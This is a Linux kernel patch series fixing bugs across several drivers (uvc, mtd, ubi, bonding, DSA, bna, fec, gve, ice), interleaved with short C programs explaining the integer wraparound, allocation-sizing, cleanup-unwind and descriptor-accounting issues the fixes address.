+@@ -785,7 +785,7 @@ void uvc_video_clock_update(struct uvc_streaming *stream,
+ 	timestamp = ktime_to_ns(first->host_time) + y - y1;
+ 
+ 	uvc_dbg(stream->dev, CLOCK,
+-		"%s: SOF %u.%06llu y %llu ts %llu buf ts %llu (x1 %u/%u/%u x2 %u/%u/%u y1 %u y2 %u)\n",
++		"%s: SOF %u.%06llu y %llu ts %llu buf ts %llu (x1 %u/%u/%u x2 %u/%u/%u y1 %u y2 %llu)\n",
+ 		stream->dev->name,
+ 		sof >> 16, div_u64(((u64)sof & 0xffff) * 1000000LLU, 65536),
+ 		y, timestamp, vbuf->vb2_buf.timestamp,
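
Widening y2 to u64 matters because a nanosecond span kept in u32 wraps after 2^32 ns (about 4.29 s), and with y1 = NSEC_PER_SEC added on top the old code overflowed for any host-time span beyond roughly 3.3 s. The wraparound in isolation:

    #include <inttypes.h>
    #include <stdint.h>
    #include <stdio.h>

    #define NSEC_PER_SEC 1000000000ULL

    int main(void)
    {
            uint64_t span_ns = 4ULL * NSEC_PER_SEC;  /* 4 s between buffers */

            uint32_t y2_32 = (uint32_t)(span_ns + NSEC_PER_SEC);
            uint64_t y2_64 = span_ns + NSEC_PER_SEC;

            /* 5e9 exceeds UINT32_MAX (~4.29e9), so the 32-bit value
             * silently wraps and the clock interpolation goes wrong. */
            printf("u32: %" PRIu32 "\nu64: %" PRIu64 "\n", y2_32, y2_64);
            return 0;
    }
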
+diff --git a/drivers/media/v4l2-core/v4l2-async.c b/drivers/media/v4l2-core/v4l2-async.c
+index 008a2a3e312e0..7471dbd140409 100644
+--- a/drivers/media/v4l2-core/v4l2-async.c
++++ b/drivers/media/v4l2-core/v4l2-async.c
+@@ -302,6 +302,9 @@ static int v4l2_async_create_ancillary_links(struct v4l2_async_notifier *n,
+ 	    sd->entity.function != MEDIA_ENT_F_FLASH)
+ 		return 0;
+ 
++	if (!n->sd)
++		return 0;
++
+ 	link = media_create_ancillary_link(&n->sd->entity, &sd->entity);
+ 
+ #endif
+diff --git a/drivers/memory/Kconfig b/drivers/memory/Kconfig
+index fac290e48e0b8..15a9e66f031d1 100644
+--- a/drivers/memory/Kconfig
++++ b/drivers/memory/Kconfig
+@@ -178,7 +178,7 @@ config FSL_CORENET_CF
+ 	  represents a coherency violation.
+ 
+ config FSL_IFC
+-	bool "Freescale IFC driver" if COMPILE_TEST
++	bool "Freescale IFC driver"
+ 	depends on FSL_SOC || ARCH_LAYERSCAPE || SOC_LS1021A || COMPILE_TEST
+ 	depends on HAS_IOMEM
+ 
+diff --git a/drivers/mfd/Makefile b/drivers/mfd/Makefile
+index 7ed3ef4a698cf..e26c64bf7cb77 100644
+--- a/drivers/mfd/Makefile
++++ b/drivers/mfd/Makefile
+@@ -276,7 +276,5 @@ obj-$(CONFIG_MFD_INTEL_M10_BMC)   += intel-m10-bmc.o
+ obj-$(CONFIG_MFD_ATC260X)	+= atc260x-core.o
+ obj-$(CONFIG_MFD_ATC260X_I2C)	+= atc260x-i2c.o
+ 
+-rsmu-i2c-objs			:= rsmu_core.o rsmu_i2c.o
+-rsmu-spi-objs			:= rsmu_core.o rsmu_spi.o
+-obj-$(CONFIG_MFD_RSMU_I2C)	+= rsmu-i2c.o
+-obj-$(CONFIG_MFD_RSMU_SPI)	+= rsmu-spi.o
++obj-$(CONFIG_MFD_RSMU_I2C)	+= rsmu_i2c.o rsmu_core.o
++obj-$(CONFIG_MFD_RSMU_SPI)	+= rsmu_spi.o rsmu_core.o
+diff --git a/drivers/mfd/omap-usb-tll.c b/drivers/mfd/omap-usb-tll.c
+index 080d7970a3774..5971b5cb290a1 100644
+--- a/drivers/mfd/omap-usb-tll.c
++++ b/drivers/mfd/omap-usb-tll.c
+@@ -237,8 +237,7 @@ static int usbtll_omap_probe(struct platform_device *pdev)
+ 		break;
+ 	}
+ 
+-	tll = devm_kzalloc(dev, sizeof(*tll) + sizeof(tll->ch_clk[nch]),
+-			   GFP_KERNEL);
++	tll = devm_kzalloc(dev, struct_size(tll, ch_clk, nch), GFP_KERNEL);
+ 	if (!tll) {
+ 		pm_runtime_put_sync(dev);
+ 		pm_runtime_disable(dev);
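
The omap-usb-tll change fixes sizing arithmetic of exactly the kind struct_size() exists to prevent: sizeof(tll->ch_clk[nch]) is the size of one array element, not of nch elements, so the old allocation under-sized the trailing flexible array whenever nch > 1. The difference, open-coded on an illustrative struct:

    #include <stdio.h>

    struct tll_demo {
            int nch;
            void *ch_clk[];    /* flexible array of per-channel clocks */
    };

    int main(void)
    {
            size_t nch = 3;

            /* Buggy: adds the size of a single element, whatever nch is. */
            size_t buggy = sizeof(struct tll_demo) +
                           sizeof(((struct tll_demo *)0)->ch_clk[nch]);
            /* What struct_size() computes: header plus nch elements
             * (plus overflow saturation, omitted here). */
            size_t right = sizeof(struct tll_demo) +
                           nch * sizeof(((struct tll_demo *)0)->ch_clk[0]);

            printf("buggy=%zu right=%zu\n", buggy, right);
            return 0;
    }
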
+diff --git a/drivers/mfd/rsmu_core.c b/drivers/mfd/rsmu_core.c
+index 29437fd0bd5bf..fd04a6e5dfa31 100644
+--- a/drivers/mfd/rsmu_core.c
++++ b/drivers/mfd/rsmu_core.c
+@@ -78,11 +78,13 @@ int rsmu_core_init(struct rsmu_ddata *rsmu)
+ 
+ 	return ret;
+ }
++EXPORT_SYMBOL_GPL(rsmu_core_init);
+ 
+ void rsmu_core_exit(struct rsmu_ddata *rsmu)
+ {
+ 	mutex_destroy(&rsmu->lock);
+ }
++EXPORT_SYMBOL_GPL(rsmu_core_exit);
+ 
+ MODULE_DESCRIPTION("Renesas SMU core driver");
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/mtd/nand/raw/Kconfig b/drivers/mtd/nand/raw/Kconfig
+index 4cd40af362de2..900b121219394 100644
+--- a/drivers/mtd/nand/raw/Kconfig
++++ b/drivers/mtd/nand/raw/Kconfig
+@@ -248,8 +248,7 @@ config MTD_NAND_FSL_IFC
+ 	tristate "Freescale IFC NAND controller"
+ 	depends on FSL_SOC || ARCH_LAYERSCAPE || SOC_LS1021A || COMPILE_TEST
+ 	depends on HAS_IOMEM
+-	select FSL_IFC
+-	select MEMORY
++	depends on FSL_IFC
+ 	help
+ 	  Various Freescale chips e.g P1010, include a NAND Flash machine
+ 	  with built-in hardware ECC capabilities.
+diff --git a/drivers/mtd/tests/Makefile b/drivers/mtd/tests/Makefile
+index 5de0378f90dbd..7dae831ee8b6b 100644
+--- a/drivers/mtd/tests/Makefile
++++ b/drivers/mtd/tests/Makefile
+@@ -1,19 +1,19 @@
+ # SPDX-License-Identifier: GPL-2.0
+-obj-$(CONFIG_MTD_TESTS) += mtd_oobtest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_pagetest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_readtest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_speedtest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_stresstest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_subpagetest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_torturetest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_nandecctest.o
+-obj-$(CONFIG_MTD_TESTS) += mtd_nandbiterrs.o
++obj-$(CONFIG_MTD_TESTS) += mtd_oobtest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_pagetest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_readtest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_speedtest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_stresstest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_subpagetest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_torturetest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_nandecctest.o mtd_test.o
++obj-$(CONFIG_MTD_TESTS) += mtd_nandbiterrs.o mtd_test.o
+ 
+-mtd_oobtest-objs := oobtest.o mtd_test.o
+-mtd_pagetest-objs := pagetest.o mtd_test.o
+-mtd_readtest-objs := readtest.o mtd_test.o
+-mtd_speedtest-objs := speedtest.o mtd_test.o
+-mtd_stresstest-objs := stresstest.o mtd_test.o
+-mtd_subpagetest-objs := subpagetest.o mtd_test.o
+-mtd_torturetest-objs := torturetest.o mtd_test.o
+-mtd_nandbiterrs-objs := nandbiterrs.o mtd_test.o
++mtd_oobtest-objs := oobtest.o
++mtd_pagetest-objs := pagetest.o
++mtd_readtest-objs := readtest.o
++mtd_speedtest-objs := speedtest.o
++mtd_stresstest-objs := stresstest.o
++mtd_subpagetest-objs := subpagetest.o
++mtd_torturetest-objs := torturetest.o
++mtd_nandbiterrs-objs := nandbiterrs.o
+diff --git a/drivers/mtd/tests/mtd_test.c b/drivers/mtd/tests/mtd_test.c
+index c84250beffdc9..f391e0300cdc9 100644
+--- a/drivers/mtd/tests/mtd_test.c
++++ b/drivers/mtd/tests/mtd_test.c
+@@ -25,6 +25,7 @@ int mtdtest_erase_eraseblock(struct mtd_info *mtd, unsigned int ebnum)
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_erase_eraseblock);
+ 
+ static int is_block_bad(struct mtd_info *mtd, unsigned int ebnum)
+ {
+@@ -57,6 +58,7 @@ int mtdtest_scan_for_bad_eraseblocks(struct mtd_info *mtd, unsigned char *bbt,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_scan_for_bad_eraseblocks);
+ 
+ int mtdtest_erase_good_eraseblocks(struct mtd_info *mtd, unsigned char *bbt,
+ 				unsigned int eb, int ebcnt)
+@@ -75,6 +77,7 @@ int mtdtest_erase_good_eraseblocks(struct mtd_info *mtd, unsigned char *bbt,
+ 
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_erase_good_eraseblocks);
+ 
+ int mtdtest_read(struct mtd_info *mtd, loff_t addr, size_t size, void *buf)
+ {
+@@ -92,6 +95,7 @@ int mtdtest_read(struct mtd_info *mtd, loff_t addr, size_t size, void *buf)
+ 
+ 	return err;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_read);
+ 
+ int mtdtest_write(struct mtd_info *mtd, loff_t addr, size_t size,
+ 		const void *buf)
+@@ -107,3 +111,8 @@ int mtdtest_write(struct mtd_info *mtd, loff_t addr, size_t size,
+ 
+ 	return err;
+ }
++EXPORT_SYMBOL_GPL(mtdtest_write);
++
++MODULE_LICENSE("GPL");
++MODULE_DESCRIPTION("MTD function test helpers");
++MODULE_AUTHOR("Akinobu Mita");
+diff --git a/drivers/mtd/ubi/eba.c b/drivers/mtd/ubi/eba.c
+index 4e1d80746b04b..38f41ce72b6ac 100644
+--- a/drivers/mtd/ubi/eba.c
++++ b/drivers/mtd/ubi/eba.c
+@@ -1560,6 +1560,7 @@ int self_check_eba(struct ubi_device *ubi, struct ubi_attach_info *ai_fastmap,
+ 					  GFP_KERNEL);
+ 		if (!fm_eba[i]) {
+ 			ret = -ENOMEM;
++			kfree(scan_eba[i]);
+ 			goto out_free;
+ 		}
+ 
+@@ -1595,7 +1596,7 @@ int self_check_eba(struct ubi_device *ubi, struct ubi_attach_info *ai_fastmap,
+ 	}
+ 
+ out_free:
+-	for (i = 0; i < num_volumes; i++) {
++	while (--i >= 0) {
+ 		if (!ubi->volumes[i])
+ 			continue;
+ 
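
The ubi cleanup switch from a full 0..num_volumes sweep to `while (--i >= 0)` is the standard partial-unwind idiom: on failure, free exactly the iterations that completed, plus (as the added kfree(scan_eba[i]) shows) the sibling allocation of the iteration that failed. In isolation:

    #include <stdio.h>
    #include <stdlib.h>

    #define N 4

    int main(void)
    {
            void *a[N] = { 0 }, *b[N] = { 0 };
            int i, ret = 0;

            for (i = 0; i < N; i++) {
                    a[i] = malloc(16);
                    b[i] = (i == 2) ? NULL : malloc(16); /* simulated failure */
                    if (!a[i] || !b[i]) {
                            free(a[i]);    /* sibling of the failed round */
                            ret = -1;
                            goto out_free;
                    }
            }
    out_free:
            /* Iteration i never completed, so unwind from i - 1 down;
             * on full success i == N and everything is freed. */
            while (--i >= 0) {
                    free(a[i]);
                    free(b[i]);
            }
            return ret;
    }
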
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 710734a5af9bf..be5348d0b22e5 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -1117,13 +1117,10 @@ static struct slave *bond_find_best_slave(struct bonding *bond)
+ 	return bestslave;
+ }
+ 
++/* must be called in RCU critical section or with RTNL held */
+ static bool bond_should_notify_peers(struct bonding *bond)
+ {
+-	struct slave *slave;
+-
+-	rcu_read_lock();
+-	slave = rcu_dereference(bond->curr_active_slave);
+-	rcu_read_unlock();
++	struct slave *slave = rcu_dereference_rtnl(bond->curr_active_slave);
+ 
+ 	if (!slave || !bond->send_peer_notif ||
+ 	    bond->send_peer_notif %
+diff --git a/drivers/net/dsa/b53/b53_common.c b/drivers/net/dsa/b53/b53_common.c
+index 59cdfc51ce06a..922e5934de733 100644
+--- a/drivers/net/dsa/b53/b53_common.c
++++ b/drivers/net/dsa/b53/b53_common.c
+@@ -2221,6 +2221,9 @@ static int b53_change_mtu(struct dsa_switch *ds, int port, int mtu)
+ 	if (is5325(dev) || is5365(dev))
+ 		return -EOPNOTSUPP;
+ 
++	if (!dsa_is_cpu_port(ds, port))
++		return 0;
++
+ 	enable_jumbo = (mtu >= JMS_MIN_SIZE);
+ 	allow_10_100 = (dev->chip_id == BCM583XX_DEVICE_ID);
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 4938550a67c02..d94b46316a117 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3606,7 +3606,8 @@ static int mv88e6xxx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	mv88e6xxx_reg_lock(chip);
+ 	if (chip->info->ops->port_set_jumbo_size)
+ 		ret = chip->info->ops->port_set_jumbo_size(chip, port, new_mtu);
+-	else if (chip->info->ops->set_max_frame_size)
++	else if (chip->info->ops->set_max_frame_size &&
++		 dsa_is_cpu_port(ds, port))
+ 		ret = chip->info->ops->set_max_frame_size(chip, new_mtu);
+ 	mv88e6xxx_reg_unlock(chip);
+ 
+diff --git a/drivers/net/ethernet/brocade/bna/bna_types.h b/drivers/net/ethernet/brocade/bna/bna_types.h
+index 666b6922e24db..ebf54d74c2bbe 100644
+--- a/drivers/net/ethernet/brocade/bna/bna_types.h
++++ b/drivers/net/ethernet/brocade/bna/bna_types.h
+@@ -410,7 +410,7 @@ struct bna_ib {
+ /* Tx object */
+ 
+ /* Tx datapath control structure */
+-#define BNA_Q_NAME_SIZE		16
++#define BNA_Q_NAME_SIZE		(IFNAMSIZ + 6)
+ struct bna_tcb {
+ 	/* Fast path */
+ 	void			**sw_qpt;
+diff --git a/drivers/net/ethernet/brocade/bna/bnad.c b/drivers/net/ethernet/brocade/bna/bnad.c
+index d6d90f9722a7e..aecdb98f8a9c1 100644
+--- a/drivers/net/ethernet/brocade/bna/bnad.c
++++ b/drivers/net/ethernet/brocade/bna/bnad.c
+@@ -1535,8 +1535,9 @@ bnad_tx_msix_register(struct bnad *bnad, struct bnad_tx_info *tx_info,
+ 
+ 	for (i = 0; i < num_txqs; i++) {
+ 		vector_num = tx_info->tcb[i]->intr_vector;
+-		sprintf(tx_info->tcb[i]->name, "%s TXQ %d", bnad->netdev->name,
+-				tx_id + tx_info->tcb[i]->id);
++		snprintf(tx_info->tcb[i]->name, BNA_Q_NAME_SIZE, "%s TXQ %d",
++			 bnad->netdev->name,
++			 tx_id + tx_info->tcb[i]->id);
+ 		err = request_irq(bnad->msix_table[vector_num].vector,
+ 				  (irq_handler_t)bnad_msix_tx, 0,
+ 				  tx_info->tcb[i]->name,
+@@ -1586,9 +1587,9 @@ bnad_rx_msix_register(struct bnad *bnad, struct bnad_rx_info *rx_info,
+ 
+ 	for (i = 0; i < num_rxps; i++) {
+ 		vector_num = rx_info->rx_ctrl[i].ccb->intr_vector;
+-		sprintf(rx_info->rx_ctrl[i].ccb->name, "%s CQ %d",
+-			bnad->netdev->name,
+-			rx_id + rx_info->rx_ctrl[i].ccb->id);
++		snprintf(rx_info->rx_ctrl[i].ccb->name, BNA_Q_NAME_SIZE,
++			 "%s CQ %d", bnad->netdev->name,
++			 rx_id + rx_info->rx_ctrl[i].ccb->id);
+ 		err = request_irq(bnad->msix_table[vector_num].vector,
+ 				  (irq_handler_t)bnad_msix_rx, 0,
+ 				  rx_info->rx_ctrl[i].ccb->name,
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 0a3df468316e5..0a5c3d27ed3b0 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -267,8 +267,8 @@ MODULE_PARM_DESC(macaddr, "FEC Ethernet MAC address");
+ #define PKT_MINBUF_SIZE		64
+ 
+ /* FEC receive acceleration */
+-#define FEC_RACC_IPDIS		(1 << 1)
+-#define FEC_RACC_PRODIS		(1 << 2)
++#define FEC_RACC_IPDIS		BIT(1)
++#define FEC_RACC_PRODIS		BIT(2)
+ #define FEC_RACC_SHIFT16	BIT(7)
+ #define FEC_RACC_OPTIONS	(FEC_RACC_IPDIS | FEC_RACC_PRODIS)
+ 
+@@ -300,8 +300,23 @@ MODULE_PARM_DESC(macaddr, "FEC Ethernet MAC address");
+ #define FEC_MMFR_TA		(2 << 16)
+ #define FEC_MMFR_DATA(v)	(v & 0xffff)
+ /* FEC ECR bits definition */
+-#define FEC_ECR_MAGICEN		(1 << 2)
+-#define FEC_ECR_SLEEP		(1 << 3)
++#define FEC_ECR_RESET           BIT(0)
++#define FEC_ECR_ETHEREN         BIT(1)
++#define FEC_ECR_MAGICEN         BIT(2)
++#define FEC_ECR_SLEEP           BIT(3)
++#define FEC_ECR_EN1588          BIT(4)
++#define FEC_ECR_BYTESWP         BIT(8)
++/* FEC RCR bits definition */
++#define FEC_RCR_LOOP            BIT(0)
++#define FEC_RCR_HALFDPX         BIT(1)
++#define FEC_RCR_MII             BIT(2)
++#define FEC_RCR_PROMISC         BIT(3)
++#define FEC_RCR_BC_REJ          BIT(4)
++#define FEC_RCR_FLOWCTL         BIT(5)
++#define FEC_RCR_RMII            BIT(8)
++#define FEC_RCR_10BASET         BIT(9)
++/* TX WMARK bits */
++#define FEC_TXWMRK_STRFWD       BIT(8)
+ 
+ #define FEC_MII_TIMEOUT		30000 /* us */
+ 
+@@ -1038,7 +1053,7 @@ fec_restart(struct net_device *ndev)
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+ 	u32 temp_mac[2];
+ 	u32 rcntl = OPT_FRAME_SIZE | 0x04;
+-	u32 ecntl = 0x2; /* ETHEREN */
++	u32 ecntl = FEC_ECR_ETHEREN;
+ 
+ 	/* Whack a reset.  We should wait for this.
+ 	 * For i.MX6SX SOC, enet use AXI bus, we use disable MAC
+@@ -1116,18 +1131,18 @@ fec_restart(struct net_device *ndev)
+ 		    fep->phy_interface == PHY_INTERFACE_MODE_RGMII_TXID)
+ 			rcntl |= (1 << 6);
+ 		else if (fep->phy_interface == PHY_INTERFACE_MODE_RMII)
+-			rcntl |= (1 << 8);
++			rcntl |= FEC_RCR_RMII;
+ 		else
+-			rcntl &= ~(1 << 8);
++			rcntl &= ~FEC_RCR_RMII;
+ 
+ 		/* 1G, 100M or 10M */
+ 		if (ndev->phydev) {
+ 			if (ndev->phydev->speed == SPEED_1000)
+ 				ecntl |= (1 << 5);
+ 			else if (ndev->phydev->speed == SPEED_100)
+-				rcntl &= ~(1 << 9);
++				rcntl &= ~FEC_RCR_10BASET;
+ 			else
+-				rcntl |= (1 << 9);
++				rcntl |= FEC_RCR_10BASET;
+ 		}
+ 	} else {
+ #ifdef FEC_MIIGSK_ENR
+@@ -1186,13 +1201,13 @@ fec_restart(struct net_device *ndev)
+ 
+ 	if (fep->quirks & FEC_QUIRK_ENET_MAC) {
+ 		/* enable ENET endian swap */
+-		ecntl |= (1 << 8);
++		ecntl |= FEC_ECR_BYTESWP;
+ 		/* enable ENET store and forward mode */
+-		writel(1 << 8, fep->hwp + FEC_X_WMRK);
++		writel(FEC_TXWMRK_STRFWD, fep->hwp + FEC_X_WMRK);
+ 	}
+ 
+ 	if (fep->bufdesc_ex)
+-		ecntl |= (1 << 4);
++		ecntl |= FEC_ECR_EN1588;
+ 
+ 	if (fep->quirks & FEC_QUIRK_DELAYED_CLKS_SUPPORT &&
+ 	    fep->rgmii_txc_dly)
+@@ -1291,7 +1306,7 @@ static void
+ fec_stop(struct net_device *ndev)
+ {
+ 	struct fec_enet_private *fep = netdev_priv(ndev);
+-	u32 rmii_mode = readl(fep->hwp + FEC_R_CNTRL) & (1 << 8);
++	u32 rmii_mode = readl(fep->hwp + FEC_R_CNTRL) & FEC_RCR_RMII;
+ 	u32 val;
+ 
+ 	/* We cannot expect a graceful transmit stop without link !!! */
+@@ -1310,7 +1325,7 @@ fec_stop(struct net_device *ndev)
+ 		if (fep->quirks & FEC_QUIRK_HAS_MULTI_QUEUES) {
+ 			writel(0, fep->hwp + FEC_ECNTRL);
+ 		} else {
+-			writel(1, fep->hwp + FEC_ECNTRL);
++			writel(FEC_ECR_RESET, fep->hwp + FEC_ECNTRL);
+ 			udelay(10);
+ 		}
+ 	} else {
+@@ -1324,11 +1339,16 @@ fec_stop(struct net_device *ndev)
+ 	/* We have to keep ENET enabled to have MII interrupt stay working */
+ 	if (fep->quirks & FEC_QUIRK_ENET_MAC &&
+ 		!(fep->wol_flag & FEC_WOL_FLAG_SLEEP_ON)) {
+-		writel(2, fep->hwp + FEC_ECNTRL);
++		writel(FEC_ECR_ETHEREN, fep->hwp + FEC_ECNTRL);
+ 		writel(rmii_mode, fep->hwp + FEC_R_CNTRL);
+ 	}
+-}
+ 
++	if (fep->bufdesc_ex) {
++		val = readl(fep->hwp + FEC_ECNTRL);
++		val |= FEC_ECR_EN1588;
++		writel(val, fep->hwp + FEC_ECNTRL);
++	}
++}
+ 
+ static void
+ fec_timeout(struct net_device *ndev, unsigned int txqueue)
+diff --git a/drivers/net/ethernet/google/gve/gve_tx_dqo.c b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+index 5147fb37929e0..eabed3deca763 100644
+--- a/drivers/net/ethernet/google/gve/gve_tx_dqo.c
++++ b/drivers/net/ethernet/google/gve/gve_tx_dqo.c
+@@ -596,22 +596,42 @@ static bool gve_can_send_tso(const struct sk_buff *skb)
+ 	const int header_len = skb_tcp_all_headers(skb);
+ 	const int gso_size = shinfo->gso_size;
+ 	int cur_seg_num_bufs;
++	int prev_frag_size;
+ 	int cur_seg_size;
+ 	int i;
+ 
+ 	cur_seg_size = skb_headlen(skb) - header_len;
++	prev_frag_size = skb_headlen(skb);
+ 	cur_seg_num_bufs = cur_seg_size > 0;
+ 
+ 	for (i = 0; i < shinfo->nr_frags; i++) {
+ 		if (cur_seg_size >= gso_size) {
+ 			cur_seg_size %= gso_size;
+ 			cur_seg_num_bufs = cur_seg_size > 0;
++
++			if (prev_frag_size > GVE_TX_MAX_BUF_SIZE_DQO) {
++				int prev_frag_remain = prev_frag_size %
++					GVE_TX_MAX_BUF_SIZE_DQO;
++
++				/* If the last descriptor of the previous frag
++				 * is less than cur_seg_size, the segment will
++				 * span two descriptors in the previous frag.
++				 * Since max gso size (9728) is less than
++				 * GVE_TX_MAX_BUF_SIZE_DQO, it is impossible
++				 * for the segment to span more than two
++				 * descriptors.
++				 */
++				if (prev_frag_remain &&
++				    cur_seg_size > prev_frag_remain)
++					cur_seg_num_bufs++;
++			}
+ 		}
+ 
+ 		if (unlikely(++cur_seg_num_bufs > max_bufs_per_seg))
+ 			return false;
+ 
+-		cur_seg_size += skb_frag_size(&shinfo->frags[i]);
++		prev_frag_size = skb_frag_size(&shinfo->frags[i]);
++		cur_seg_size += prev_frag_size;
+ 	}
+ 
+ 	return true;
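
The new accounting in gve_can_send_tso() is plain arithmetic: a fragment larger than GVE_TX_MAX_BUF_SIZE_DQO is emitted as max-size descriptors plus a remainder, and a TSO segment that starts inside that remainder but does not fit there must spill into the next descriptor, costing two buffers. A sketch with assumed sizes (the real limits live in the driver):

    #include <stdio.h>

    #define MAX_BUF 4096    /* assumed stand-in for GVE_TX_MAX_BUF_SIZE_DQO */

    int main(void)
    {
            int prev_frag = 12000;  /* previous fragment: 4096+4096+3808 */
            int seg_bytes = 3900;   /* segment bytes still owed by it */
            int tail = prev_frag % MAX_BUF;

            /* The segment needs 3900 bytes but the fragment's last
             * descriptor holds only 3808, so it spans two descriptors. */
            printf("tail=%d, spans two descriptors: %s\n", tail,
                   (tail && seg_bytes > tail) ? "yes" : "no");
            return 0;
    }
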
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+index 8c6e13f87b7d3..1839a37139dc1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool_fdir.c
+@@ -531,7 +531,7 @@ ice_parse_rx_flow_user_data(struct ethtool_rx_flow_spec *fsp,
+  *
+  * Returns the number of available flow director filters to this VSI
+  */
+-static int ice_fdir_num_avail_fltr(struct ice_hw *hw, struct ice_vsi *vsi)
++int ice_fdir_num_avail_fltr(struct ice_hw *hw, struct ice_vsi *vsi)
+ {
+ 	u16 vsi_num = ice_get_hw_vsi_num(hw, vsi->idx);
+ 	u16 num_guar;
+diff --git a/drivers/net/ethernet/intel/ice/ice_fdir.h b/drivers/net/ethernet/intel/ice/ice_fdir.h
+index 1b9b844906899..b384d2a4ab198 100644
+--- a/drivers/net/ethernet/intel/ice/ice_fdir.h
++++ b/drivers/net/ethernet/intel/ice/ice_fdir.h
+@@ -202,6 +202,8 @@ struct ice_fdir_base_pkt {
+ 	const u8 *tun_pkt;
+ };
+ 
++struct ice_vsi;
++
+ int ice_alloc_fd_res_cntr(struct ice_hw *hw, u16 *cntr_id);
+ int ice_free_fd_res_cntr(struct ice_hw *hw, u16 cntr_id);
+ int ice_alloc_fd_guar_item(struct ice_hw *hw, u16 *cntr_id, u16 num_fltr);
+@@ -213,6 +215,7 @@ int
+ ice_fdir_get_gen_prgm_pkt(struct ice_hw *hw, struct ice_fdir_fltr *input,
+ 			  u8 *pkt, bool frag, bool tun);
+ int ice_get_fdir_cnt_all(struct ice_hw *hw);
++int ice_fdir_num_avail_fltr(struct ice_hw *hw, struct ice_vsi *vsi);
+ bool ice_fdir_is_dup_fltr(struct ice_hw *hw, struct ice_fdir_fltr *input);
+ bool ice_fdir_has_frag(enum ice_fltr_ptype flow);
+ struct ice_fdir_fltr *
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+index fb8e856933097..bff3e9662a8fd 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl_fdir.c
+@@ -551,6 +551,8 @@ static void ice_vc_fdir_reset_cnt_all(struct ice_vf_fdir *fdir)
+ 		fdir->fdir_fltr_cnt[flow][0] = 0;
+ 		fdir->fdir_fltr_cnt[flow][1] = 0;
+ 	}
++
++	fdir->fdir_fltr_cnt_total = 0;
+ }
+ 
+ /**
+@@ -1567,6 +1569,7 @@ ice_vc_add_fdir_fltr_post(struct ice_vf *vf, struct ice_vf_fdir_ctx *ctx,
+ 	resp->status = status;
+ 	resp->flow_id = conf->flow_id;
+ 	vf->fdir.fdir_fltr_cnt[conf->input.flow_type][is_tun]++;
++	vf->fdir.fdir_fltr_cnt_total++;
+ 
+ 	ret = ice_vc_send_msg_to_vf(vf, ctx->v_opcode, v_ret,
+ 				    (u8 *)resp, len);
+@@ -1631,6 +1634,7 @@ ice_vc_del_fdir_fltr_post(struct ice_vf *vf, struct ice_vf_fdir_ctx *ctx,
+ 	resp->status = status;
+ 	ice_vc_fdir_remove_entry(vf, conf, conf->flow_id);
+ 	vf->fdir.fdir_fltr_cnt[conf->input.flow_type][is_tun]--;
++	vf->fdir.fdir_fltr_cnt_total--;
+ 
+ 	ret = ice_vc_send_msg_to_vf(vf, ctx->v_opcode, v_ret,
+ 				    (u8 *)resp, len);
+@@ -1797,6 +1801,7 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 	struct virtchnl_fdir_add *stat = NULL;
+ 	struct virtchnl_fdir_fltr_conf *conf;
+ 	enum virtchnl_status_code v_ret;
++	struct ice_vsi *vf_vsi;
+ 	struct device *dev;
+ 	struct ice_pf *pf;
+ 	int is_tun = 0;
+@@ -1805,6 +1810,17 @@ int ice_vc_add_fdir_fltr(struct ice_vf *vf, u8 *msg)
+ 
+ 	pf = vf->pf;
+ 	dev = ice_pf_to_dev(pf);
++	vf_vsi = ice_get_vf_vsi(vf);
++
++#define ICE_VF_MAX_FDIR_FILTERS	128
++	if (!ice_fdir_num_avail_fltr(&pf->hw, vf_vsi) ||
++	    vf->fdir.fdir_fltr_cnt_total >= ICE_VF_MAX_FDIR_FILTERS) {
++		v_ret = VIRTCHNL_STATUS_ERR_PARAM;
++		dev_err(dev, "Max number of FDIR filters for VF %d is reached\n",
++			vf->vf_id);
++		goto err_exit;
++	}
++
+ 	ret = ice_vc_fdir_param_check(vf, fltr->vsi_id);
+ 	if (ret) {
+ 		v_ret = VIRTCHNL_STATUS_ERR_PARAM;
